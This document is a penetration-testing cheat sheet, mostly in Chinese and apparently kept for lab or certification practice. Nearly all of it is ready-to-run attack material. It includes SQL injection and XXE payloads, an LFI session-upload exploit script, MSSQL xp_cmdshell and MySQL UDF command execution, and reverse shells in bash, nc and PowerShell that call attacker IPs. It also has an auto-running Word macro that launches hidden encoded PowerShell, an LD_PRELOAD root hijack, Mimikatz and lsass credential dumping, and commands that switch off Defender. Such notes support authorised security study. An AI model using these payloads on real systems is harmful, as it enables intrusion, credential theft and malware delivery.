掃 IP
fping -g 10.10.110.0/24for i in {1..254} ;do (ping -c 1 172.16.1.$i | grep "bytes from" &) ;donenmap -PE -PM -PP -sn -n 172.16.1.0/24Windows
for /l %i in (1,1,254) do @ping -n 1 -w 100 172.16.2.%i | find "Reply"
掃 port
rustscan -a <ip> -r 1-65535 -t 1500 --tries 3 -- -Anmap 各指令
nmap -sV --script vuln <ip>-sV 各服務的版本-sC 用 default script 掃-A 偵測主機的作業系統與各種服務的版本-p- 所有 port 都掃sudo nmap -sUV -T4 -F --version-intensity 0 <IP> Fast UDP Scan
nc -zv -w 1 172.16.2.6 1-9000 2>&1 | grep succeeded
dirsearch
python3 dirsearch.py -u https://target-w wordlist
gobuster
gobuster dir -u <url> -w <wordlist> --timeout 30s -x "zip,php,html" -s '200,204,301,302,307,403,500' -egobuster vhost -u horizontall.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txtexample
ffuf
ffuf -u http://[website] -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.[domain name]"-fw Filter by amount of words
wordlist
/usr/share/seclists/Discovery/Web-Content/
if found /cgi-bin/ : scan extension -> cgi, sh, pl, py
Path traversal
subdomain
take a look
/etc/passwd/etc/apache2/.htpasswd
log poisoning
/var/log/apache2/error.log/etc/httpd/logs/access_log/var/log/apache2/access.log 可以用 nc 傳 GET/var/log/auth.log 從 ssh username 塞 payload
../ -> %2e%2e%2fdefault session path : /var/lib/php/sessions/sess_{sess_name}
Session upload progress
import grequests
sess_name = 'exploit'
sess_path = f'/var/lib/php/sessions/sess_{ sess_name }
base_url = '<url>'
param = '<LFI parameter>'
code = '''<PHP code>'''
while True :
req = [grequests .post (base_url ,
files = {'f' : "A" * 0xffff },
data = {'PHP_SESSION_UPLOAD_PROGRESS' : f"exploit:<?php { code } },
cookies = {'PHPSESSID' : sess_name }),
grequests .get (f"{ base_url } { param } { sess_path } )]
result = grequests .map (req )
if "exploit" in result [1 ].text :
print (result [1 ].text )
break
可以自己 host payload 檔案 (python3 -m http.server 80)
也可以用 data:text/plain,<?php php_payload?>,建議先看看 phpinfo() 有沒有 ban function,或 <?php var_dump(ini_get('disable_functions'));
function 被 ban 也有很多 方法 可以繞,最終也有 這種 能用
wpscan --url host –-enumerate p,t,u --plugins-detection aggressive -t 30
用 Hydra 爆破 admin --enumerate ap,at,cb,dbe
All plugins
All themes
Config backups
Db export
Tools -> Site Health Section
可能有重要資訊 (DB) wp-config.php
Password db
SELECT concat(user_login,":",user_pass) FROM wp_users;
'OR 1=1# 萬用密碼假設以下是第二個column會回顯,撈資料庫名
' union select 1,database(),3,4#
撈table
' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),3,4#
撈column
' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='[table_name]' limit 0,1),3,4#或是"[table_name]"用ascii to hex也可以 (算是sqli的一種小技巧)
撈裡面的東西
' union select 1,(select [column_name] from [table_name] limit 0,1),3,4#
Payload All the Things
Apache
Default log : /var/log/apache2/access.log
Default config path : /etc/httpd/conf/httpd.conf
IIS
可執行的是 aspx 檔案
root 通常會在 c:\inetpub\wwwroot\ 底下
Tomcat
Path
/manager/status/all/admin/dashboard
Path Bypass
With /..;/
e.g. /manager/status/..;/html/upload
<?xml version =" 1.0" encoding =" utf-8" DOCTYPE xxe [<!ENTITY xxe SYSTEM " file:///etc/passwd" root >
<search >&xxe; </search >
</root >
JSP
PHP
ASPX
Adminer (SQLadmin)
wordpress plugin
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.php
壓成 zip 以後上傳
enum4linux
enum4linux -a <ip> 簡單掃所有資訊
Scan version
用 msfconsole 的 smbversion
找 share file
nmap -p <port> --script=smb-enum-shares.nse,smb-enum-users.nse <ip> smbclient //<ip>/<share_path>
smbclient
連上 smb server
smbclient -L <ip>-p 指定 port-U 指定 username--no-pass 或 -N 沒密碼
smbmap
Eternal Blue (若在 windows 可以檢查有沒有 MS17-010)
AutoBlue 檢查
用 shellcode 中的內容生 exploit shellcode
$ nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin
$ msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f raw -o evilReverse.bin
$ cat evilKernel.bin evilReverse.bin > evilPayload.bin
MS17-010 script python send_and_execute.py <ip> reverse.exe
CVE-2017-7494 SambaCry , linux/samba/is_known_pipename
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 -Pn <ip>
If got NT_STATUS_CONNECTION_DISCONNECTED
--option='client min protocol=nt1'
nmap --script ftp-anon -p 21 <ip>
檢查是不是 anonymous
如果是就可以直接用 username anonymous 不需要密碼登入
ftp <ip>FileZilla
Default password location
C:\Program Files\FileZilla Server\FileZilla Server.xml
MySQL service 用 root 而且沒有 password
Injection
User-Defined Function (UDF) Dynamic Library
SHOW VARIABLES LIKE 'plugin_dir';
Write File Method (1)
use mysql;create table hack(line blob);insert into hack values(load_file('/tmp/lib_sys_udf.so'));
select * from hack into dumpfile '/{plugin_dir}/lib_sys_udf.so';
Write File Method (2)
xxd -p -c 9999999 lib_sys_udf.soSET @SHELL=0x{.....}SHOW VARIABLES LIKE 'plugin_dir';SELECT BINARY @SHELL INTO DUMPFILE '{PLUGIN_DIR}/meow.so';
create function do_system returns integer soname 'lib_sys_udf.so';select do_system("{Bash script}");
用這兩種連 (Default port : 1433)
sqsh -S <ip> -U <username> -P <password>
impacket-mssqlclient -p <port> <username>@<IP> -windows-auth
開權限,跑 cmd 拿 reverse shell
1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure
3> go
1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go
1> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://192.168.119.175/reverse.ps1')"
2> go
若要用 base64 跑 powershell command,要先 encode
echo "..." | iconv -t UTF-16LE | base64 -w 0
powershell -enc <base64>
backup
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup/master.mdfOr short path C:/PROGRA~1/MICROS~1/MSSQL1~1.SQL/MSSQL/Backup/master.mdf
其他
Network File System,在掛在遠端機器上時,如果是 not squash 的話就會繼承遠端時的使用者資訊,你在遠端用 root 建資料,這個資料回到 local 也會是屬於 root 的
查看 /etc/exports 這個檔案裡有沒有資料夾是 no_root_squash/no_all_squash 的
其他詳細 攻擊機端,把資料夾掛上後開始做 shell
mkdir /tmp/nfs
mount -t nfs <ip>:/ /tmp/nfs
chown root /tmp/nfs/bash
chmod +s /tmp/nfs/bash
mount -o port=2049 -t nfs localhost:/ /tmp/test
查看是否有 mountable NFS folder
NfSpy
成功掛上以後可以 spoof 出 username
Write shell / file
Connect
Set dir
config set dir "/var/www/html"
Set file name
config set dbfilename meow.php
Write web shell
set x "\r\n\r\n<?php system($_GET[A]);?>\r\n\r\n"
Save
Zone Tranfer
dig axfr @[DNS server] [domain name]
nslookup
SERVER <dns server> (with port 53)
gpg 是個加解密的工具
asc 是 public key,pgp 是加密後的檔案
gpg2john <.asc> > hash
# 爆破密碼
john <hash> --wordlist=<list>
# 以下需要密碼
gpg --import <.asc>
gpg --decrypt <.pgp>
meterpreter
用 background 就可以讓 session 放到背景
sessions 可以看到所有正在跑的 session
叫出 console
msfconsoleuse <exploit>set payload windows/x64/shell/reverse_tcpshow actionsset <action>show optionsset <OPTION> <option 內容>exploit
jobs
msfvenom MSFVenom Reverse Shell Payload Cheatsheet PowerShell
$client = New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 |
Out-String );$sendback2 = $sendback + "# ";$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyt
e.Length);$stream.Flush()};$client.Close()
Directory
Hydra
hydra -l <username> -P <password-file.txt> <ip> sshhydra -l <username> -P <password-file.txt> <ip> http-post-form "<path on website>:username=admin&password=^PASS^:Invalid Password"
John
unshadow passwd.txt shadow.txt > hash.txtjohn hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
ZIP
zip2john <file.zip> > <file.txt>john <file.txt>
SSH private key
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
ssh2john.py id_rsa > id_rsa.john
ncrack
ncrack -vv --user <user> -P <wordlist> ftp://<ip>
hashcat
hashcat -m 1800 <hash.txt> <wordlist.txt>-m 是 hash type,這裡查 type example
CrackStation wordlist
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
cewl
把網頁裡可能作為 username 和 password 的字爬出來
攻擊 nc -nvlp 1234
靶機 bash -c 'bash -i >& /dev/tcp/10.17.15.47/1234 0>&1'
在 web shell 上可能會需要先 urlencode (& -> %26)
也可以放在 index.html 中開 http server,改下 curl <ip> | bash
在靶機執行 nc 192.168.119.188 1235 -e /bin/bash 也可以彈 reverse shell
Reverse Shell Cheat Sheet php-reverse-shell windows-php-reverse-shell perl reverse shell 讓 shell 好看一點
python -c 'import pty; pty.spawn("/bin/bash")'SHELL=/bin/bash script -q /dev/nullperl -e 'exec "/bin/bash";'
方便的東西
rlwrap (可以在 reverse shell 切上下鍵)
socat
Server : socat file:`tty`,raw,echo=0 tcp-listen:{PORT}
Client : ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{IP}:{PORT}
tsh
要把 tsh.h 裡面設定好,然後直接用 make (不要用那個 sh)
在靶機跑 ./tsh,kali 跑 ./tshd
powershell 的 reverse shell
在最後加 Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port>
MSFVenom Reverse Shell Payload Cheatsheet
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.125 LPORT=1234 EXITFUNC=thread -f exe -a x86 --platform windows -o reverse.exe
造惡意 macro 的方法
View → Macros,設好 Macros in 的檔案和 name 以後 Create 就可以寫 macros
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.245 LPORT=1234 -f hta-psh -o reverse.hta切一下
str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range (0 , len (str ), n ):
print ("Str = Str + " + '"' + str [i :i + n ] + '"' )
寫 Macro
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
...
Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
Str = Str + "QA="
CreateObject("Wscript.Shell").Run Str
End Sub
一定要存 doc 才行
steghide
apt install steghidesteghide extract -xf <file>
exiftool
exiftool <file>查看 metadata
Foremost
foremost -i <file>把隱藏的檔案拆出來
Binwalk
binwalk <file> : Displays the data from the filebinwalk -e <file> : Displays and extracts the data from the given file
netcat
發送 nc <ip> 1234 < file
或是 cat <file> > /dev/tcp/<ip>/<port> 也可以
接收 nc -l -p 1234 > file
webserver
python3 -m http.server 80windows 上有 smb 時
impacket-smbserver <sharename> <sharefolder>靶機上 copy <目的> \\<ip>\<sharename>
Windows
certutil -urlcache -split -f "http://<ip>/<filename>" <output>powershell -c (New-Object Net.WebClient).DownloadFile('http://<ip>/<filename>', '<output>')exec ps1 at remote
powershell "IEX(New-Object Net.WebClient).downloadString('http://<ip>/<filename.ps1>')"
更多其他
Linux Privilege-Esccalation
sudo -l
看看有沒有密碼,或是有洞 ex.CVE-2019-14287、CVE-2021-3156
sudo version 1.8.28 以前,sudo 有這個設定的話 ALL=(ALL:!root) NOPASSWD: ALL 可以用 sudo -u#-1 <cmd> 提權
sudo version 1.8.26 以前
可以用 LD_PRELOAD、LD_LIBRARY_PATH 的話,可以 ldd 看看有哪些可以用 root 執行的程式用了 shared library 可以綁架
find SUID/GUID file
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/nullfind / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null除了一些原本就有的服務,若有不常見的也可以查查看 exploit
GTFObins
get capabilities
getcap -r / 2>/dev/null若 binary 有 CAP_SETUID,就可以用來提權
/etc/shadow - passwd
如果有可以看到 shadow 的權限就有機會爆破
john --wordlist=./rockyou.txt hash.txt
如果可以寫,也可以竄改 hash
mkpasswd -m sha-512 <newpasswd>
如果 passwd 有寫的權限,也可以竄改 (把前兩個冒號間的 x 換掉)
openssl passwd -1 -salt <user> <pass>或是直接把 root 那一行改上密碼 hash 插在最後一行也可以
su root參考
writable
find / -writable -type d 2>/dev/null
crontab
可以檢查看看有沒有排程的腳本 cat /etc/crontab 是以 root 去跑的
如果有可以 write 的就可以改完 (寫 reverse shell) 等他被 root 跑,或是他不是用完整路徑名稱就可以觀察他的 PATH,有機會用自己寫的來攔截
pspy 也是個查看的工具有時候觀察類似 backups 這種東西的修改時間也可以推測他可能是 crontab 做的
ls -lah /etc/cron*grep "CRON" /var/log/cron.log
注意有沒有沒用絕對路徑的,就有機會改 PATH 劫持
若有一個可以用 root 執行的腳本,可以複製 /bin/bash 並以 root 身分給 chmod u+s (給 suid),就能拿來提權了
沒藏好的密碼
偷看 user 有沒有曾經打過密碼
檢查有沒有 config 是沒被藏好的,像是 ovpn 之類的
看看 .ssh 裡面有沒有遺漏掉的 key (ssh -i key user@ip)
C Library hijack
用 ldd 可以看看 binary 有沒有用到 shared library
在 sudo -l 下也可以看到能不能使用 LD_PRELOAD LD_LIBRARY_PATH
如果上面兩個都可以就能自己寫假 so 來劫持
gcc -fPIC -shared -nostartfiles -o <preload.so> <preload.c>sudo LD_LIBRARY_PATH=. <program>
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
Docker escape
如果在根目錄底下有 .dockerenv 的話,這環境就很有可能是 docker,有可能會需要 escape,可以觀察有沒有腳本明顯像是被外面執行的 (ex. backup 相關)
掃提權弱點
netstat
netstat -tulpn | grep LISTENnetstat -ano
ps
Windows Privilege-Esccalation
Windows Overflow 切換不同使用者
CPAU
./cpau.exe -u <username> -p <password> -ex "nc.exe <ip> <port> -e cmd.exe" -LWP (彈 reverse shell,-ex 後也可以接普通要執行的指令)
runas
runas /user:<username> <command>
Winpeas Mimikatz
github download vault::cred 取得 credentialprivilege::debug + token::elevate 拿權限sekurlsa::logonpasswords full 爆密碼lsadump::dcsync /domain:{DOMAIN NAME} /all /csv
Dump domain user hash (need domain admin)
mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"cheatsheet
accesschk.exe 檢查有沒有可利用
accesschk.exe -ucqv <Service_Name> * /accepteula
sc config SSDPSRV binpath= "C:\\Inetpub\\wwwroot\\rootshell.exe"
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\\LocalSystem" password= ""
evil-winrm
evil-winrm -i <ip> -u <user> -H <hash>
smb shell
winexe -U '<username>' //{ip} cmd.exeimpacket-smbexec '<user>:<password>'@<ip>impacket-psexec '<user>:<password>'@<ip>pth-winexe -U <username>%NT:LM //<ip> cmd
writable
accesschk.exe -uws "Everyone" "C:\Program Files"Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
XP/VISTA/2003/2008
AlwaysInstallElevated
檢查有沒有開
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
安裝壞 msi
msiexec /quiet /qn /i <bad>.msi
Cached Credentials
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON"same as mimikatz lsadump::cache
dir 像 ls 一樣,加 -ah 顯示隱藏的檔案type 像 cat 一樣echo %PROCESSOR_ARCHITECTURE% 印出架構systeminfo
whoami
md mkdirshutdown -r -t 0
net user 列出所有 user關掉 netsh Advfirewall set allprofiles state off
開遠端桌面 (for windows 10)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
real time 關 Defender
Set-MpPreference -DisableRealtimeMonitoring $true
關 Defender (查看開機時,defender 會不會被關閉)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
加上使用者
net user <username> <password> /add
net localgroup Administrators <username> /add
icacls
列出權限
icacls "<path/filename>"
看 OS 和 Process 跑在什麼架構
[Environment]::Is64BitOperatingSystem
[Environment]::Is64BitProcess
64 bits powershell
%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe
OS version
[System.Environment]::OSVersion.Version
reg save hklm\sam c:\samreg save hklm\system c:\systemsamdump2 system sam > sam.txtsecretsdump.py -sam SAM.hiv -security SECURITY.hiv -system SYSTEM.hiv LOCAL > reg_creds.txt若是沒有 reg 或想方便一點可以傳 fgdump.exe 過去用
dump lsass
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <pid> lsass.dmp fullprocdump.exe -accepteula -ma lsass.exe lsass.dmppypykatz lsa minidump lsass.dmp
如果路徑裡面有空白又沒有用引號刮起來,就有機會劫持這個執行檔
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
PowerShell History Path
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
User Home、Desktop、Document、Download
C:\Windows\System32\drivers\etc\hostshttps://pentestlab.blog/2017/04/19/stored-credentials/ 直接找文件中的字 grep -R '<regex>'
wmic service get name,pathname
netstat -ano
Open Port netstat -an | findstr "LISTENING"
tasklist
like ps /v : list user
kill process /f /PID <pid>
sc
list the selected service sc qc <service>
list all service sc queryex type=service state=all
net start list running service
Shellter
Auto Mode : A
PE Target : {whoami.exe}
Stealth mode : N
Custom : C
Payload : {raw_file}
msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -e x86/shikata_ga_nai -f raw > {FILE}.raw
DLL Loader : N
開 reverse tunnel
chisel port forward
kali ./chisel server -p 9999 --reverse
target ./chisel client 10.10.14.135:9999 R:8000:127.0.0.1:8000
proxy
kali ./chisel server -p 9999 --reverse --socks5
target ./chisel client 192.168.119.161:9999 R:socks
ssh remote port forwarding
ssh -N -R <attacker ip>:<port>:127.0.0.1:<port> <attacker>@<attacker ip>
ssh dynamic port forwarding
ssh -NfD 9487 <user>@<ip>
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9487
就可以用 proxychains4 用 proxy 了 (-q 可以讓它閉嘴)
SSH
-L port:remote:remote_port
forward 某個 port 到 remote port
-D port
往 remote 開 SOCKS 5 proxy ([local:port] -> [remote])
-R remote_port
往 local 開 SOCKS 5 proxy ([remote:port] -> [local])
-R remote_port:local:port
forward 某個 remote port 到 local port
-N
GatewayPorts: 用來指定 -R/-L 是 bind 到哪個 interface 上,改成 * 或是留空可以讓他預設聽在 0.0.0.0 (沒設定的話就只能 bind 到 localhost)
用 powershell 開關防火牆
netsh advfirewall firewall add rule name="TCP Port 1234" dir=in action=allow protocol=TCP localport=1234netsh advfirewall firewall delete rule name="TCP Port 1234" protocol=TCP localport=1234
印出防火牆規則
netsh advfirewall firewall show rule name=all dir=out type=dynamic
用 linux 連上 windows RDP
rdesktop rdesktop <ip>xfreerdp +drives /u:{username} /p:{password} /v:{ip}:{port}
/size:1800x1000/u:<domain\username>